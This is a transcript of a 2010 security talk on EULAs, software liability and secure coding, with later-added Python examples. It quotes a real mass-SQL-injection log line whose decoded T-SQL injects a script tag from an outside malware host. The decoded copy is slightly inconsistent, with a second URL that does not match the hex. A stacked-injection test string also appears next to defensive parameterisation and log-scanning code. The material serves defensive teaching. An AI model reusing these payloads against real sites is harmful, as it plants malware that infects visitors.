state of the eula -- "who pays for secure code?"

© 2010 WhiteHat, Inc. Joshua Marpet Security Solutions Specialist 5.1.2010 State of the EULA Who pays for Secure Code? Wednesday, May 12, 2010

Upload: rochester-security-summit

Post on 07-Nov-2014


DESCRIPTION

What are the business and societal implications of requiring secure coding practices to be implemented in the software industry? Would it affect you or your organization? How would it change the landscape of our industry, our legal system, and our wallets? Why don't developers write it now? How did the system get the way it did and how will it change in the future? In this talk, we strive to come up with the answers. Bring your best ideas. Let's talk.

Nick Schilbe, WhiteHat Security

Nick Schilbe is a Security Engineering Supervisor at WhiteHat Security, leading a team of security engineers who manage WhiteHat Sentinel, the company’s SaaS-based website vulnerability management service. Mr. Schilbe develops, refines and implements new processes and workflows for the WhiteHat Sentinel family of website risk management solutions. His WhiteHat Security Engineering team provides service to more than 500 production e-commerce, financial services and healthcare websites, including many Fortune 500 companies.

TRANSCRIPT

Page 1: State of the EULA -- "Who pays for Secure Code?"

© 2010 WhiteHat, Inc.

Joshua Marpet, Security Solutions Specialist

5.1.2010

State of the EULA Who pays for Secure Code?

Wednesday, May 12, 2010

Page 2: State of the EULA -- "Who pays for Secure Code?"

© 2010 WhiteHat, Inc. | Page

Definitions

Secure Software
• software that is written so as to preclude the possibility of syntactical or technical attacks
• software written using a secure framework
• software executed behind a Secure Framework appliance

EULA - End User License Agreement
• A software license agreement is a contract between the "licensor" and purchaser of the right to use software. The license may define ways under which the copy can be used, in addition to the automatic rights of the buyer including the first sale doctrine and 17 U.S.C. § 117 (freedom to use, archive, re-sale, and backup).
• Many form contracts are only contained in digital form, and only presented to a user as a click-through where the user must "accept". As the user may not see the agreement until after he or she has already purchased the software, these documents may be contracts of adhesion. These documents often call themselves end-user license agreements (EULAs).

Reasons for EULAs:
• Because they can
• To hold harmless
• To circumvent copyright law, to extend copyright where it is prohibited

Page 3: State of the EULA -- "Who pays for Secure Code?"

Anti-Terrorism EULA

You agree ... development, design ... production of missiles, or nuclear, chemical or biological weapons.

iTunes? Nukes? Srsly?

Page 4: State of the EULA -- "Who pays for Secure Code?"

Page 5: State of the EULA -- "Who pays for Secure Code?"

“Do not taunt happy fun ball” Srsly??

Page 6: State of the EULA -- "Who pays for Secure Code?"

Page 7: State of the EULA -- "Who pays for Secure Code?"

SDLC: Software Development Life Cycle

Why do we need EULA’s? Because of the SDLC.

Page 9: State of the EULA -- "Who pays for Secure Code?"

SDLC: Software Development Life Cycle

Do you see the word Security?

Page 11: State of the EULA -- "Who pays for Secure Code?"

Implicit Security

How is this different from, say, a car? Your car has the capability to do great damage to people or property. Where does the liability lie if that damage occurs?
• Driver licensing
• Insurance
• Laws
• Police to ensure laws are followed
• Road engineering to make it harder to get in wrecks
• Manufacturer: IF the auto is found to be defective, LARGE liability (Firestone tires; Toyota gas pedal/carpet/computer/whatever!)
• NHTSA crash ratings
• Huge insurance policies to offset

Page 15: State of the EULA -- "Who pays for Secure Code?"

Software security is Explicit. It must be specified by the person or company commissioning the software.

Automobile security is IMPLICIT - built into the automobile design process, mandated by various regulatory agencies, and incentivized by insurance companies who DON'T want to pay out on huge claims from owners and manufacturers alike.

Page 16: State of the EULA -- "Who pays for Secure Code?"

Explicit Results

Consumer: the software they bought is not built implicitly secure.
• Keep track of security patches for the software I own
• Purchase 3rd-party means to protect the computer from malicious internet-based software: random worms, trojans, viruses, etc.

Companies: if used in production environments, they take on liability.

Page 17: State of the EULA -- "Who pays for Secure Code?"

Secure Code = ?

Why is Secure Code Explicit? Money. Developers receive no extra money to write secure code. As a matter of fact, they are actually penalized. Development teams are on deadlines for functional code, not secure functional code. Taking the time to write secure code will take away from the time needed to get the functionality, user interface (UI), documentation, etc, done.

Page 18: State of the EULA -- "Who pays for Secure Code?"

Dev Team Ramifications

What would happen to individual developers, or small dev teams if security was IMPLICIT? The days of agile development, and small teams coming up with widgets or "apps" would be over. The equivalent of malpractice insurance would simply be setting the bar too high for individuals or small teams to get over, much as it is in the auto or plane industry today. (Mind you, I'm not suggesting we should change the auto or plane industry, just making a comparison.)

Page 19: State of the EULA -- "Who pays for Secure Code?"

Open Source?

What about open source software? If we keep the comparisons going, it would fit into much the same idea as "X" or experimental planes are in, or hot rods, in the car industry. So long as it meets some reasonable definition of safety, you can get insurance. That insurance will be with very much smaller claim limits, and it will cover a lot fewer categories of problems, but if you choose to have that experimental plane or hot rod car, that's the explicit choice you make. If you choose to go with open source software, you save on up front costs, but you have explicitly made a choice to have software without implicit support.

Page 22: State of the EULA -- "Who pays for Secure Code?"

Marketability

There's also the marketability of developer skills. As a developer, would you rather have Java, .NET, and C# on your resume, or MyKonos, which, although good, no one has heard of?

Page 23: State of the EULA -- "Who pays for Secure Code?"

Secure Code = ? Extra Testing!

So what would happen if we got rid of the EULA? If it was decreed that code HAS to be secure, out of the gate?

We would quickly have problems finding developers who know how to code securely. But that can be fixed via using secure frameworks, secure code appliances, and/or a heck of a lot of developer education. Once that problem was solved, the cost of software would rise dramatically. Testing would become an onerous burden on dev teams, as every revision of code would require full rounds of QA, regression testing, unit testing, etc. This is besides the extra time (read money) it would take to write the initial code as secure.

Page 25: State of the EULA -- "Who pays for Secure Code?"

Secure Framework - MyKonos

Example of a secure framework, and a secure code appliance. (similar to a WAF, but not as widely known)

Page 26: State of the EULA -- "Who pays for Secure Code?"

Top Ten Web Hacking Techniques (2009)

MUST be able to protect against HOSTILE WEB PAGE

MUST be able to protect against HOSTILE WEB USER

Page 27: State of the EULA -- "Who pays for Secure Code?"

Website Classes of Attacks

Page 29: State of the EULA -- "Who pays for Secure Code?"

Website Classes of Attacks

Technical: Automation Can Identify

Command Execution
• Buffer Overflow
• Format String Attack
• LDAP Injection
• OS Commanding
• SQL Injection
• SSI Injection
• XPath Injection

Information Disclosure
• Directory Indexing
• Information Leakage
• Path Traversal
• Predictable Resource Location

Client-Side
• Content Spoofing
• Cross-site Scripting
• HTTP Response Splitting*

Business Logic: Humans Required

Authentication
• Brute Force
• Insufficient Authentication
• Weak Password Recovery Validation
• CSRF*

Authorization
• Credential/Session Prediction
• Insufficient Authorization
• Insufficient Session Expiration
• Session Fixation

Logical Attacks
• Abuse of Functionality
• Denial of Service
• Insufficient Anti-automation
• Insufficient Process Validation

Page 30: State of the EULA -- "Who pays for Secure Code?"

Page 31: State of the EULA -- "Who pays for Secure Code?"

Page 32: State of the EULA -- "Who pays for Secure Code?"

http://blogs.apache.org/infra/entry/apache_org_04_09_2010

Page 33: State of the EULA -- "Who pays for Secure Code?"

Mass SQL Injection

• Generic SQL Injection populates databases with malicious JavaScript IFRAMEs (millions of websites infected - more every day)

• Visitors arrive and their browser auto-connects to a malware server infecting their machine with trojans -- or the website is damaged and can no longer conduct business.

• Botnets form then continue SQL injecting websites

• Infected sites risk becoming blacklisted on search engines and Web filtering gateways causing loss of visitors

Random Opportunistic
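The slide above describes a generic, opportunistic SQL injection: one request that appends a second statement rewriting every stored text column, so each page the site serves afterwards carries the attacker's script tag. The example below is added here and is not code from the talk or from WhiteHat. It uses Python's sqlite3 module with a constructed in-memory catalogue to show, side by side, a lookup that concatenates the request parameter into a script of stacked statements (the defect the slide's attack relies on) and the parameterised form, in which the same input is bound as a value and can never terminate the statement and start another.

```python
import sqlite3

# Constructed sample data (not from the talk): a small catalogue whose text
# columns are exactly what a mass-SQL-injection UPDATE would rewrite.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
INSERT INTO products VALUES (1, 'Widget', 'A fine widget');
INSERT INTO products VALUES (2, 'Gadget', 'A fine gadget');
"""

# Marker the injected statement appends; a harmless placeholder URL stands in
# for the script host seen in the real payload.
INJECTED_JS = '"></title><script src="http://www.example.com/w.js"></script><!--'

# Constructed request parameter: a valid id followed by a second statement.
STACKED_INPUT = (
    "1; UPDATE products SET description = description || '" + INJECTED_JS + "'"
)


def fresh_db():
    """In-memory database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def descriptions(conn):
    """All product descriptions in id order, so each lookup's effect can be checked."""
    return [row[0] for row in conn.execute(
        "SELECT description FROM products ORDER BY id")]


def lookup_vulnerable(conn, product_id):
    """Builds the statement by string concatenation and runs it with
    executescript(), which, like the database behind the slide's log line,
    accepts several statements separated by ';'. Anything after a ';' in the
    parameter therefore runs as SQL with the application's privileges."""
    conn.executescript("SELECT name FROM products WHERE id = " + product_id + ";")
    return [row[0] for row in conn.execute(
        "SELECT name FROM products WHERE id = 1")]


def lookup_safe(conn, product_id):
    """Bound parameter: exactly one prepared statement runs and the whole
    request value is compared against id as data. A value that is not a plain
    number simply matches no row; it cannot add a statement."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM products WHERE id = ?", (product_id,))]


def compare():
    """Run both lookups on the stacked input and report whether stored text survived."""
    safe_db = fresh_db()
    lookup_safe(safe_db, STACKED_INPUT)
    vuln_db = fresh_db()
    lookup_vulnerable(vuln_db, STACKED_INPUT)
    return {
        "safe_intact": descriptions(safe_db) == ["A fine widget", "A fine gadget"],
        "vulnerable_intact": not any(INJECTED_JS in d for d in descriptions(vuln_db)),
    }


if __name__ == "__main__":
    print(compare())
```

The fix is not input filtering: the parameterised lookup never inspects the value, it simply hands it to the driver separately from the statement text, which is why the same input that rewrites every row through the concatenated version leaves the parameterised database untouched.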

Page 34: State of the EULA -- "Who pays for Secure Code?"

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast (0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

Decoded...

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
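To see the log line above for what it is, a defender has to URL-decode the request and turn the 0x... literal back into text, which is the decoding step the slide did by hand. The scanner below is an added example, not from the talk or from WhiteHat. It uses only the Python standard library and runs over two constructed access-log lines (one clean, one carrying a short, harmless hex-encoded statement constructed for the test); for each suspicious line it reports any CAST(0x... AS CHAR) literal it finds, decoded, and whether the request stacks a DECLARE ... EXEC( sequence after a semicolon.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR(n)), also NCHAR / VARCHAR / NVARCHAR, as in the slide's log line.
HEX_CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-fA-F]+)\s+as\s+n?(?:var)?char\b", re.I)
# A stacked DECLARE ... EXEC( sequence appended after a ';' in the query string.
STACKED_EXEC_RE = re.compile(r";\s*DECLARE\s+@\w+.*?;\s*EXEC\s*\(", re.I | re.S)
# Request target between the method and the HTTP version of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(.+?)\s+HTTP/\d\.\d"')


def decode_hex_literal(hexdigits):
    """Turn a 0x... literal back into text. The payload on the slide is plain
    ASCII; latin-1 keeps any other byte value visible instead of raising."""
    return bytes.fromhex(hexdigits).decode("latin-1")


def scan_log_line(line):
    """Return None for a clean line, otherwise the decoded request and findings."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    request = unquote(m.group(1))        # %20 and friends back to characters first
    decoded = [decode_hex_literal(h) for h in HEX_CAST_RE.findall(request)]
    stacked = STACKED_EXEC_RE.search(request) is not None
    if not decoded and not stacked:
        return None
    return {"request": request, "decoded": decoded, "stacked_exec": stacked}


def scan_log(lines):
    """(line index, finding) for every line that trips either check."""
    findings = []
    for i, line in enumerate(lines):
        result = scan_log_line(line)
        if result is not None:
            findings.append((i, result))
    return findings


# Constructed sample (not from the talk): the hidden statement is harmless and
# short so the line stays readable; its shape follows the slide's log line.
HIDDEN_SQL = "DECLARE @T varchar(255) select 1"
HEX = HIDDEN_SQL.encode("ascii").hex().upper()
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2010:10:00:00 -0400] "GET /index.aspx?id=7 HTTP/1.1" 200 512 "-"',
    '10.0.0.9 - - [12/May/2010:10:00:01 -0400] "GET /?;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=cast(0x' + HEX + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"',
]

if __name__ == "__main__":
    for index, finding in scan_log(SAMPLE_LOG):
        print(f"line {index}: stacked EXEC={finding['stacked_exec']}")
        for statement in finding["decoded"]:
            print("  decoded:", statement)
```

The HTTP status on the slide's line is 200: the application answered normally, so nothing in the response tells you the statement ran. Decoding the request is the only place in the web log where the injected T-SQL is visible, which is why a check like this belongs in log review even when the database itself is not instrumented.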

Page 35: State of the EULA -- "Who pays for Secure Code?"

http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/
http://government.zdnet.com/?p=5242
http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech

Victims: TJ Maxx, Barnes & Noble, BJ’s Wholesale, Boston Market, DSW Shoe Warehouse, Forever 21, Office Max, Sports Authority, Heartland Payment Systems, Hannaford Brothers, 7-Eleven, Dave and Busters

Techniques: SQL Injection, Sniffers, Wireless Security / War Driving, Shared Passwords, Malware, Anti-Forensics, Backdoors, Social Engineering

Hacker 1

Hacker 2

Albert "Segvec" Gonzalez

Fully Targeted

Page 42: State of the EULA -- "Who pays for Secure Code?"

Twitter Hacker

http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/

“I’m sorry” - Hacker Croll

Hacker Croll initiates a password recovery for a Twitter employee’s Gmail account. Reset email to secondary account: ******@h******.com.

Guesses secondary Hotmail account, deactivated, but is able to re-register the account. Resends the reset email and bingo.

Pilfers inbox for passwords to other Web services, sets the Gmail password to the original so employee would not notice.

Owned! Used the same password to compromise the employee's email on Google Apps, steal hundreds of internal documents, and access Twitter's domains at GoDaddy. Sent to TechCrunch.

Personal AT&T, MobileMe, Amazon, iTunes and other accounts accessed using username/passwords and password recovery systems.

Page 43: State of the EULA -- "Who pays for Secure Code?"

Business Goals & Budget Justification

Risk Mitigation: "If we spend $X on Y, we’ll reduce risk of loss of $A by B%."

Due Diligence: "We must spend $X on Y because it’s an industry best-practice."

Incident Response: "We must spend $X on Y so that Z never happens again."

Regulatory Compliance: "We must spend $X on Y because <insert regulation> says so."

Competitive Advantage: "We must spend $X on Y to make the customer happy."

Page 44: State of the EULA -- "Who pays for Secure Code?"

WhiteHat Security Top Ten

Percentage likelihood of a website having a vulnerability, by class (chart values recovered from the slide):
• Cross-Site Scripting 65%
• Information Leakage 47%
• Content Spoofing 30%
• Insufficient Authorization 18%
• SQL Injection 17%
• Predictable Resource Location 14%
• Session Fixation 11%
• Cross-Site Request Forgery 11%
• Insufficient Authentication 10%
• HTTP Response Splitting 9%

Page 45: State of the EULA -- "Who pays for Secure Code?"

Time-to-Fix (Days)

Chart: Time-to-Fix (days) by class: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, SQL Injection, Predictable Resource Location, Session Fixation, Cross-Site Request Forgery, Insufficient Authentication, HTTP Response Splitting. Values shown on the chart: 5885, 7172, 3879, 10456, 12580.

Best-case scenario: Not all vulnerabilities have been fixed...

Page 46: State of the EULA -- "Who pays for Secure Code?"

Resolution Rate - By Class

Class of Attack | % resolved | Severity
Cross Site Scripting | 20% | urgent
Insufficient Authorization | 19% | urgent
SQL Injection | 30% | urgent
HTTP Response Splitting | 75% | urgent
Directory Traversal | 53% | urgent
Insufficient Authentication | 38% | critical
Cross-Site Scripting | 39% | critical
Abuse of Functionality | 28% | critical
Cross-Site Request Forgery | 45% | critical
Session Fixation | 21% | critical
Brute Force | 11% | high
Content Spoofing | 25% | high
HTTP Response Splitting | 30% | high
Information Leakage | 29% | high
Predictable Resource Location | 26% | high

Page 47: State of the EULA -- "Who pays for Secure Code?"

Page 48: State of the EULA -- "Who pays for Secure Code?"

http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/

How the breach was detected:
• 3rd party detection due to FRAUD (55%)
• 3rd party detection NOT due to fraud (15%)
• Employee discovery (13%)
• Unusual system performance (11%)

Page 49: State of the EULA -- "Who pays for Secure Code?"

http://www.zdnet.com.au/mcafee-clients-do-you-have-the-guts-339302660.htm?omnRef=http%3A%2F%2Fwww.zdnet.com.au%2Fmcafee-clients-do-you-have-the-guts-339302660.htm

So which would you rather have? Software with Implicit security, and the corresponding high bar to entry, with mal-dev insurance policies and government agencies mandating security practices? Or software without implicit security, and the EULA of the Damned?

Page 50: State of the EULA -- "Who pays for Secure Code?"

References / Organizations

OWASP - Open Web Application Security Project
http://www.owasp.org
• Webgoat - VMs with vulns to hack
• Webscarab - proxy to see how hackers work
• Multiple other projects!
• Join! It’s free!

WASC - Web Application Security Consortium
http://www.webappsec.org
• TC V2 - http://projects.webappsec.org/Threat-Classification
